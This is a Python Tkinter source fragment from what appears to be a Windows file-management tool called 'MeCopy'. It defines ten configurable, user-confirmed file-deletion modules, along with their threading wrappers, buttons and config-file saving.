Src_Del_Path_10.set(Src_Del_Path_Selected_10)
Src_Del_Path_10 = tk.StringVar()
Del_Extensions_10 = tk.StringVar()
Path_Name_Del_10 = tk.StringVar()
Src_Del_Path_10.set(parser.get("Paths_Src_2", "path_10"))
Src_Title_Del_10 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=481)
Patch_Del_Entry_10 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_10).place(x=746, y=485)
Button_Search_Path_Del_10 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_10).place(x=873, y=484)
Path_Name_Del_10.set(parser.get("Path_Names_2", "path_name_10"))
Del_Extensions_10.set(parser.get("Extensions_2", "Search_10"))
Entry_Path_Del_10 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_10).place(x=755, y=462)
Ext_Search_Del_10 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=462)
Entry_Del_Extensions_10 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_10).place(x=960, y=486)
#DEL_SRC_REQUEST_END
#DEL_MODULES_START
def Delete_Module_1():
try:
parser.set("Paths_Src_2", "path_1", Src_Del_Path.get())
parser.set("Extensions_2", "Search_1", Del_Extensions_1.get())
parser.set("Path_Names_2", "path_name_1", Path_Name_Del_1.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path.get())
Del_Extension_Read = literal_eval(parser.get("Extensions_2", "Search_1"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_1") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_1")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=67, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=45)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
progressbar.destroy()
Transfer_InProcress.destroy()
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=67)
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_1")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_2():
try:
parser.set("Paths_Src_2", "path_2", Src_Del_Path_2.get())
parser.set("Extensions_2", "Search_2", Del_Extensions_2.get())
parser.set("Path_Names_2", "path_name_2", Path_Name_Del_2.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_2.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_2"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_2") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_2")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=178, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=157)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=178)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_2")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_3():
try:
parser.set("Paths_Src_2", "path_3", Src_Del_Path_3.get())
parser.set("Extensions_2", "Search_3", Del_Extensions_3.get())
parser.set("Path_Names_2", "path_name_3", Path_Name_Del_3.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_3.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_3"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_3") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_3")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=296, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=275)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
progressbar.destroy()
Transfer_InProcress.destroy()
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=296)
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_3")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_4():
try:
parser.set("Paths_Src_2", "path_4", Src_Del_Path_4.get())
parser.set("Extensions_2", "Search_4", Del_Extensions_4.get())
parser.set("Path_Names_2", "path_name_4", Path_Name_Del_4.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_4.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_4"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_4") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_4")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=414, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=393)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=414)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_4")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_5():
try:
parser.set("Paths_Src_2", "path_5", Src_Del_Path_5.get())
parser.set("Extensions_2", "Search_5", Del_Extensions_5.get())
parser.set("Path_Names_2", "path_name_5", Path_Name_Del_5.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_5.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_5"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_5") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_5")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=531, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=510)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=531)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_5")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_6():
try:
parser.set("Paths_Src_2", "path_6", Src_Del_Path_6.get())
parser.set("Extensions_2", "Search_6", Del_Extensions_6.get())
parser.set("Path_Names_2", "path_name_6", Path_Name_Del_6.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_6.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_6"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_6") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_6")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=67, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=45)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=67)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_6")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_7():
try:
parser.set("Paths_Src_2", "path_7", Src_Del_Path_7.get())
parser.set("Extensions_2", "Search_7", Del_Extensions_7.get())
parser.set("Path_Names_2", "path_name_7", Path_Name_Del_7.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_7.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_7"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_7") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_7")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=178, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=157)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=178)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_7")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_8():
try:
parser.set("Paths_Src_2", "path_8", Src_Del_Path_8.get())
parser.set("Extensions_2", "Search_8", Del_Extensions_8.get())
parser.set("Path_Names_2", "path_name_8", Path_Name_Del_8.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_8.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_8"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_8") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_8")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=296, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=275)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=296)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_8")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_9():
try:
parser.set("Paths_Src_2", "path_9", Src_Del_Path_9.get())
parser.set("Extensions_2", "Search_9", Del_Extensions_9.get())
parser.set("Path_Names_2", "path_name_9", Path_Name_Del_9.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_9.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_9"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_9") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_9")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=414, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=393)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=414)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_9")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_10():
try:
parser.set("Paths_Src_2", "path_10", Src_Del_Path_10.get())
parser.set("Extensions_2", "Search_10", Del_Extensions_10.get())
parser.set("Path_Names_2", "path_name_10", Path_Name_Del_10.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_10.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_10"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_10") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_10")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=531, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=510)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=531)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_10")+" is misspelled or do not exist.", title="MeCopy")
pass
# DEL_MODULES_END
# START_DELETE_THREADS
def schedule_check_Del_1(Patch_1_Thread):
root.after(1000, check_if_done_Del_1, Patch_1_Thread)
def check_if_done_Del_1(Patch_1_Thread):
if not Patch_1_Thread.is_alive():
Btn_Del_1["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_1(Patch_1_Thread)
def Delete_Module_1_Thread():
Btn_Del_1["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_1_Thread = threading.Thread(target=Delete_Module_1)
Patch_1_Thread.start()
schedule_check_Del_1(Patch_1_Thread)
def schedule_check_Del_2(Patch_2_Thread):
root.after(1000, check_if_done_Del_2, Patch_2_Thread)
def check_if_done_Del_2(Patch_2_Thread):
if not Patch_2_Thread.is_alive():
Btn_Del_2["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_2(Patch_2_Thread)
def Delete_Module_2_Thread():
Btn_Del_2["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_2_Thread = threading.Thread(target=Delete_Module_2)
Patch_2_Thread.start()
schedule_check_Del_2(Patch_2_Thread)
def schedule_check_Del_3(Patch_3_Thread):
root.after(1000, check_if_done_Del_3, Patch_3_Thread)
def check_if_done_Del_3(Patch_3_Thread):
if not Patch_3_Thread.is_alive():
Btn_Del_3["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_3(Patch_3_Thread)
def Delete_Module_3_Thread():
Btn_Del_3["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_3_Thread = threading.Thread(target=Delete_Module_3)
Patch_3_Thread.start()
schedule_check_Del_3(Patch_3_Thread)
def schedule_check_Del_4(Patch_4_Thread):
root.after(1000, check_if_done_Del_4, Patch_4_Thread)
def check_if_done_Del_4(Patch_4_Thread):
if not Patch_4_Thread.is_alive():
Btn_Del_4["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_4(Patch_4_Thread)
def Delete_Module_4_Thread():
Btn_Del_4["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_4_Thread = threading.Thread(target=Delete_Module_4)
Patch_4_Thread.start()
schedule_check_Del_4(Patch_4_Thread)
def schedule_check_Del_5(Patch_5_Thread):
root.after(1000, check_if_done_Del_5, Patch_5_Thread)
def check_if_done_Del_5(Patch_5_Thread):
if not Patch_5_Thread.is_alive():
Btn_Del_5["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_5(Patch_5_Thread)
def Delete_Module_5_Thread():
Btn_Del_5["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_5_Thread = threading.Thread(target=Delete_Module_5)
Patch_5_Thread.start()
schedule_check_Del_5(Patch_5_Thread)
def schedule_check_Del_6(Patch_6_Thread):
root.after(1000, check_if_done_Del_6, Patch_6_Thread)
def check_if_done_Del_6(Patch_6_Thread):
if not Patch_6_Thread.is_alive():
Btn_Del_6["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_6(Patch_6_Thread)
def Delete_Module_6_Thread():
Btn_Del_6["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_6_Thread = threading.Thread(target=Delete_Module_6)
Patch_6_Thread.start()
schedule_check_Del_6(Patch_6_Thread)
def schedule_check_Del_7(Patch_7_Thread):
root.after(1000, check_if_done_Del_7, Patch_7_Thread)
def check_if_done_Del_7(Patch_7_Thread):
if not Patch_7_Thread.is_alive():
Btn_Del_7["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_7(Patch_7_Thread)
def Delete_Module_7_Thread():
Btn_Del_7["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_7_Thread = threading.Thread(target=Delete_Module_7)
Patch_7_Thread.start()
schedule_check_Del_7(Patch_7_Thread)
def schedule_check_Del_8(Patch_8_Thread):
root.after(1000, check_if_done_Del_8, Patch_8_Thread)
def check_if_done_Del_8(Patch_8_Thread):
if not Patch_8_Thread.is_alive():
Btn_Del_8["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_8(Patch_8_Thread)
def Delete_Module_8_Thread():
Btn_Del_8["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_8_Thread = threading.Thread(target=Delete_Module_8)
Patch_8_Thread.start()
schedule_check_Del_8(Patch_8_Thread)
def schedule_check_Del_9(Patch_9_Thread):
root.after(1000, check_if_done_Del_9, Patch_9_Thread)
def check_if_done_Del_9(Patch_9_Thread):
if not Patch_9_Thread.is_alive():
Btn_Del_9["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_9(Patch_9_Thread)
def Delete_Module_9_Thread():
Btn_Del_9["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_9_Thread = threading.Thread(target=Delete_Module_9)
Patch_9_Thread.start()
schedule_check_Del_9(Patch_9_Thread)
def schedule_check_Del_10(Patch_10_Thread):
root.after(1000, check_if_done_Del_10, Patch_10_Thread)
def check_if_done_Del_10(Patch_10_Thread):
if not Patch_10_Thread.is_alive():
Btn_Del_10["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_10(Patch_10_Thread)
def Delete_Module_10_Thread():
Btn_Del_10["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_10_Thread = threading.Thread(target=Delete_Module_10)
Patch_10_Thread.start()
schedule_check_Del_10(Patch_10_Thread)
# END_DELETE_THREADS
Change_Del = ttk.Button(Move_Frame, text="Delete Files ->",
command=lambda: raise_frame(Delete_Menu_Screen))
Change_Del.place(x=570, y=572)
Change_Move = ttk.Button(Delete_Frame, text=" <-Return",
command=lambda: raise_frame(Move_Screen))
Change_Move.place(x=480, y=572)
btnFind5 = ttk.Button(Move_Frame, text="Start All", command=lambda: [Move_1_Thread(), Move_2_Thread(), Move_3_Thread(
), Move_4_Thread(), Move_5_Thread(), Move_6_Thread(), Move_7_Thread(), Move_8_Thread(), Move_9_Thread(), Move_10_Thread()])
btnFind5.place(x=480, y=572)
Del_All = ttk.Button(Delete_Frame, text="Delete all", command=lambda: [Delete_Module_1_Thread(), Delete_Module_2_Thread(), Delete_Module_3_Thread(), Delete_Module_4_Thread(), Delete_Module_5_Thread(), Delete_Module_6_Thread(), Delete_Module_7_Thread(), Delete_Module_8_Thread(), Delete_Module_9_Thread(), Delete_Module_10_Thread()])
Del_All.place(x=570, y=572)
# MOVE BUTTONS
Btn_Move_1 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_1_Thread()])
Btn_Move_1.place(x=193, y=77)
Btn_Move_2 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_2_Thread()])
Btn_Move_2.place(x=193, y=190)
Btn_Move_3 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_3_Thread()])
Btn_Move_3.place(x=193, y=305)
Btn_Move_4 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_4_Thread()])
Btn_Move_4.place(x=193, y=424)
Btn_Move_5 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_5_Thread()])
Btn_Move_5.place(x=193, y=540)
Btn_Move_6 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_6_Thread()])
Btn_Move_6.place(x=778, y=77)
Btn_Move_7 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_7_Thread()])
Btn_Move_7.place(x=778, y=190)
Btn_Move_8 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_8_Thread()])
Btn_Move_8.place(x=778, y=305)
Btn_Move_9 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_9_Thread()])
Btn_Move_9.place(x=778, y=424)
Btn_Move_10 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_10_Thread()])
Btn_Move_10.place(x=785, y=540)
# END MOVE BUTTONS
# DEL BUTTONS
Btn_Del_1 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_1_Thread()])
Btn_Del_1.place(x=193, y=50)
Btn_Del_2 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_2_Thread()])
Btn_Del_2.place(x=193, y=160)
Btn_Del_3 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_3_Thread()])
Btn_Del_3.place(x=193, y=277)
Btn_Del_4 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_4_Thread()])
Btn_Del_4.place(x=193, y=396)
Btn_Del_5 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_5_Thread()])
Btn_Del_5.place(x=193, y=512)
Btn_Del_6 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_6_Thread()])
Btn_Del_6.place(x=778, y=50)
Btn_Del_7 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_7_Thread()])
Btn_Del_7.place(x=778, y=160)
Btn_Del_8 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_8_Thread()])
Btn_Del_8.place(x=778, y=277)
Btn_Del_9 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_9_Thread()])
Btn_Del_9.place(x=778, y=396)
Btn_Del_10 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_10_Thread()])
Btn_Del_10.place(x=785, y=512)
# END DEL BUTTONS
raise_frame(Move_Screen)
root.mainloop()
os.system('taskkill /f /im Robocopy.exe')
# START_MOVE_PATHS_NAMES
parser.set("Path_Names", "path_name_1", Move_Module_Name_1.get())
parser.set("Path_Names", "path_name_2", Move_Module_Name_2.get())
parser.set("Path_Names", "path_name_3", Move_Module_Name_3.get())
parser.set("Path_Names", "path_name_4", Move_Module_Name_4.get())
parser.set("Path_Names", "path_name_5", Move_Module_Name_5.get())
parser.set("Path_Names", "path_name_6", Move_Module_Name_6.get())
parser.set("Path_Names", "path_name_7", Move_Module_Name_7.get())
parser.set("Path_Names", "path_name_8", Move_Module_Name_8.get())
parser.set("Path_Names", "path_name_9", Move_Module_Name_9.get())
parser.set("Path_Names", "path_name_10", Move_Module_Name_10.get())
